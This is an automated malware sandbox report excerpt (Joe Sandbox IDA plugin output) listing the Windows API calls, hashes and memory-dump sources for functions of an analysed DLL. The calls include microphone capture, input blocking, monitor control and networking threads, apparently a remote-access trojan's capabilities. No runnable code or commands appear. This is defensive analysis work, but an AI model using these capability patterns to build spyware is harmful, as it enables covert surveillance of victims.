                                                                                              • Instruction ID: df4bb2cff17a4dad36bc039b66e6a0bfb7aaed8d7346e5ccee572720da75d4d5
                                                                                              • Opcode Fuzzy Hash: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
                                                                                              • Instruction Fuzzy Hash: A93123722443405BF328DB348C84B2A77E6EB85760F62462DF94A972D0CFB8AC44C609
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1000881C
                                                                                              • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000), ref: 1000883B
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10008844
                                                                                              • lstrlen.KERNEL32(?,?,?,00000000), ref: 1000884B
                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000000), ref: 10008859
                                                                                              • lstrlen.KERNEL32(?,?,?,00000000), ref: 10008887
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 100088AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                                                                                              • String ID:
                                                                                              • API String ID: 2793549963-0
                                                                                              • Opcode ID: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                                                                                              • Instruction ID: aba3aad5fd678ceee709943c066d7c1318fba4e8ca5bf8cd350ee25dca26516d
                                                                                              • Opcode Fuzzy Hash: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                                                                                              • Instruction Fuzzy Hash: C621E1327003145FE7089A78EC95A6BB6DAEBC8721F44453DFA02C7380EAF5AD09C760
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 10005588
                                                                                              • gethostbyname.WS2_32(?), ref: 10005594
                                                                                              • inet_ntoa.WS2_32(?), ref: 100055BE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000562C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000562F
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 10005658
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000566B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 772126777-0
                                                                                              • Opcode ID: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
                                                                                              • Instruction ID: d8acfb67411859da9f326e055f778afd8bf87ba093dd899f6f4e0a5fb8b5cdca
                                                                                              • Opcode Fuzzy Hash: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
                                                                                              • Instruction Fuzzy Hash: A321D8727403155BF328DB349C95B1B76E2FBC4761F65462DFA52A72D0CEF4AC048618
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 10005688
                                                                                              • gethostbyname.WS2_32(?), ref: 10005694
                                                                                              • inet_ntoa.WS2_32(?), ref: 100056BE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000572C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000572F
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005758
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 1000576B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 772126777-0
                                                                                              • Opcode ID: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
                                                                                              • Instruction ID: 9488327e99ebaf0692ae378b052773dd40b9acca62f8510c4b65027830434a75
                                                                                              • Opcode Fuzzy Hash: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
                                                                                              • Instruction Fuzzy Hash: 7F21E4327443156BF324DB349C85B1BB6E2EB84B60F254629FA02AB2D0CEF4AC048618
                                                                                              APIs
                                                                                              • inet_addr.WS2_32(?), ref: 10005788
                                                                                              • gethostbyname.WS2_32(?), ref: 10005794
                                                                                              • inet_ntoa.WS2_32(?), ref: 100057BE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000582C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1000582F
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005858
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000586B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 772126777-0
                                                                                              • Opcode ID: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
                                                                                              • Instruction ID: 5a4b8bc2c2b8071631b041413c90c1d326417705303120385d25498e08fc0dd5
                                                                                              • Opcode Fuzzy Hash: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
                                                                                              • Instruction Fuzzy Hash: D121B4727443156BF324DB349C85B1BB6E2EB84B61F254629FA52AB2D0CEF4EC048618
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,10007EAC,00000001), ref: 10008904
                                                                                                • Part of subcall function 100089B0: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,10007EAC,00000001), ref: 100089D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??3@CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 1804927778-0
                                                                                              • Opcode ID: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                                                                                              • Instruction ID: 535a8f0a5c1657d4f4a0f8731bc608884a1cc126f303587fb67b32ffd65e399e
                                                                                              • Opcode Fuzzy Hash: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                                                                                              • Instruction Fuzzy Hash: 3D21C176300351ABF310DB65EC88F6BB799EBC5761F10852AF745DB280D6B1A8058771
                                                                                              APIs
                                                                                              • waveInGetNumDevs.WINMM(?,?,?,10002E20), ref: 10002EF5
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10003060,?,00000004,?), ref: 10002F1E
                                                                                              • waveInOpen.WINMM(?,0000FFFF,?,00000000,00000000,00020000,?,00000004,?,?,?,?,10002E20), ref: 10002F40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$CreateDevsOpenThread
                                                                                              • String ID:
                                                                                              • API String ID: 3981276002-0
                                                                                              • Opcode ID: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
                                                                                              • Instruction ID: 398045f82957bc6df3ca42976268de9e0ed9c6986921e5dfa378deda77a8059f
                                                                                              • Opcode Fuzzy Hash: f899148c17e92582b95a9ade1cd278979c1292ac457a3f49cb89178182b37f8e
                                                                                              • Instruction Fuzzy Hash: 0A216DB5240312AFE314CF68DC84F62B7A9FB89350F204669F645CB685CB71E851CBA0
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(0000000A), ref: 1000F78C
                                                                                              • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1000F7A7
                                                                                              • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1000F7BA
                                                                                              • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 1000F7D6
                                                                                              • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1000F7E9
                                                                                                • Part of subcall function 1000F260: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
                                                                                                • Part of subcall function 1000F260: CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
                                                                                                • Part of subcall function 1000F260: ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1
                                                                                              • BlockInput.USER32(?), ref: 1000F7F8
                                                                                                • Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000000), ref: 1000FB47
                                                                                                • Part of subcall function 1000FB30: GetSystemMetrics.USER32(00000001), ref: 1000FB50
                                                                                              • BlockInput.USER32(00000000), ref: 1000F82B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: System$BlockInfoInputMessageMetricsParametersSend$??2@CloseHandleObjectSingleSleepWait
                                                                                              • String ID:
                                                                                              • API String ID: 1415795360-0
                                                                                              • Opcode ID: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
                                                                                              • Instruction ID: d37ac442a261cbdb69aff6c5209fa7087b7225f6be27279a8c23c941b82a95ba
                                                                                              • Opcode Fuzzy Hash: a791b87f4cc88397c4dd79c47234a6532703d493a210a795a8861b8dbafbc20e
                                                                                              • Instruction Fuzzy Hash: D521F63434839421F944EB344CA3BBA278ACF85BD4F10053DB6956F9C7CEE1A849B655
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006DE0
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10006DE9
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006DFA
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10006DFD
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005190,00000000,00000000,00000000), ref: 10006E22
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006AD0,00000000,00000000,00000000), ref: 10006E35
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00004940,00000000,00000000,00000000), ref: 10006E48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 738052048-0
                                                                                              • Opcode ID: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
                                                                                              • Instruction ID: bddd40b6041f7b89adb1d7152d05c651aa16d4d0b1a7c0af783e3df771abeb65
                                                                                              • Opcode Fuzzy Hash: e942b1669b3e5fceb261c73c181bbe6314d4fe8e9c67c2bf7ddd2b4b70dca4f5
                                                                                              • Instruction Fuzzy Hash: E321427178035576F234AB658C47F466AD5EB94B60F310529F785BF2D0CAF4B8408A5C
                                                                                              APIs
                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10003072
                                                                                              • SetEvent.KERNEL32(?,?,00000000,00000000), ref: 100030A4
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000), ref: 100030AC
                                                                                              • waveInAddBuffer.WINMM(?,000003C0,00000020,?,00000000,00000000), ref: 100030C6
                                                                                              • TranslateMessage.USER32(?), ref: 100030DB
                                                                                              • DispatchMessageA.USER32(?), ref: 100030E6
                                                                                              • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 100030F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$BufferDispatchEventObjectSingleTranslateWaitwave
                                                                                              • String ID:
                                                                                              • API String ID: 3294988761-0
                                                                                              • Opcode ID: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
                                                                                              • Instruction ID: d3f2bca1204f73eed7e2b61ebc1a15db6f1c2b26f9a106d8012aa4ef57a1d5f5
                                                                                              • Opcode Fuzzy Hash: a13249123283d46861fbd4dbce8f47e33c9aab61f2623cb77106a890fef3b3c4
                                                                                              • Instruction Fuzzy Hash: 6411AF71204351ABF320DF64DC88F67B7E9EB88760F004A2DFA0197290E7B5E908CB61
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10006D1F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10006D28
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10006C10,00000000,00000000,00000000), ref: 10006D39
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 10006D3C
                                                                                              • CreateThread.KERNEL32(00000000,00000000,10006AD0,00000000,00000000,00000000), ref: 10006D74
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$CloseHandle
                                                                                              • String ID: gfff
                                                                                              • API String ID: 738052048-1553575800
                                                                                              • Opcode ID: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
                                                                                              • Instruction ID: 2020a1e7590e07279854810b9ce9ec764bac815170356a4596bb53d82c307b61
                                                                                              • Opcode Fuzzy Hash: 2ade835562a74c2ae575d7a2d0ea3662dbbcb1a35346048c5e1d3004f01ae6c3
                                                                                              • Instruction Fuzzy Hash: C711EC72B4031527F228D6299C46F1666D6EBD4760F25412AF745FB2D4C5F4BC408649
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1DA
                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F1E2
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F0
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F1F8
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F204
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A0C3,000000FF,10009E7B), ref: 1000F20A
                                                                                              • DestroyCursor.USER32(?), ref: 1000F234
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                                                                                              • String ID:
                                                                                              • API String ID: 2236516186-0
                                                                                              • Opcode ID: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
                                                                                              • Instruction ID: 0f553e4c3eadbe8d6fbd977fb2ead2f207a6b34009dca0ff4597f70e2537c953
                                                                                              • Opcode Fuzzy Hash: 4a28c952b0f9e7e2652dead6d7c3cb7b04e5c5168fa64a9a7694eccdc290ac34
                                                                                              • Instruction Fuzzy Hash: A2215BB5200755ABE324DF59CC80B66F3A9FB89720F110B1DE56283690C7B5B8058B90
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D3C5
                                                                                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D3D3
                                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 1000D40C
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,10069EE6,000000FF), ref: 1000D417
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                                                                                              • String ID: closesocket$ws2_32.dll
                                                                                              • API String ID: 1041861973-181964208
                                                                                              • Opcode ID: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
                                                                                              • Instruction ID: 90d420deef0742d789c7d7b03315d7db99f4f8719d0783f2fb5b7f6c44804b8f
                                                                                              • Opcode Fuzzy Hash: 668f17c356eef956a6f1f78d0dc39e4a6590e6c29db532610f3eed179543c746
                                                                                              • Instruction Fuzzy Hash: EB11A0755047859BE300DF28CC44B5AB7E8FF49761F400B2EF96AD3290D7B899048AA1
                                                                                              APIs
                                                                                              • lstrlen.KERNEL32(00000000,?,00000000,100075E0,00000000), ref: 10007C31
                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C3A
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,100075E0,00000000), ref: 10007C41
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,100075E0,00000000), ref: 10007C49
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,100075E0,00000000), ref: 10007C5F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10007C72
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10007C79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@ByteCharMultiWidelstrlen$??3@
                                                                                              • String ID:
                                                                                              • API String ID: 1676418047-0
                                                                                              • Opcode ID: fb4cd3e966eb61606cad13a92799049cb3e66f4be6874b68efb03894c3cec11b
